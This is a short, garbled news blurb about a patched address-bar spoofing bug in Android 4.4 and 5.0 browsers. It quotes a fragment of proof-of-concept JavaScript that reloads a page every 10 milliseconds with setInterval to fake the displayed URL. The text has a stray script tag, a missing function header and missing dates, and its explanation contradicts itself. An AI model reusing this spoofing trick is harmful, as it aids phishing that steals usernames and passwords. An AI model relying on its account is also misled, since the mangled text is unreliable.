The bug was dangerous, as the bug allowed the browser's address bar to be spoofed. That can be enough to convince a victim of a phishing email or text message to enter their usernames and passwords.
The bug was patched in early and then in later April. It affected Android 4.4 "KitKat" and Android 5.0 "Lollipop."
<script>The code is hilariously simple to understand, webpage reloads roughly every 10 milliseconds (random) using the setInterval() function, just before the browser can get the real page and so the user sees the ‘real’ web address instead of the fake one - Paulos explain about the code.
location="http://www.dailymail.co.uk/home/index.html?random="+Math.random(); } setInterval("f()",10);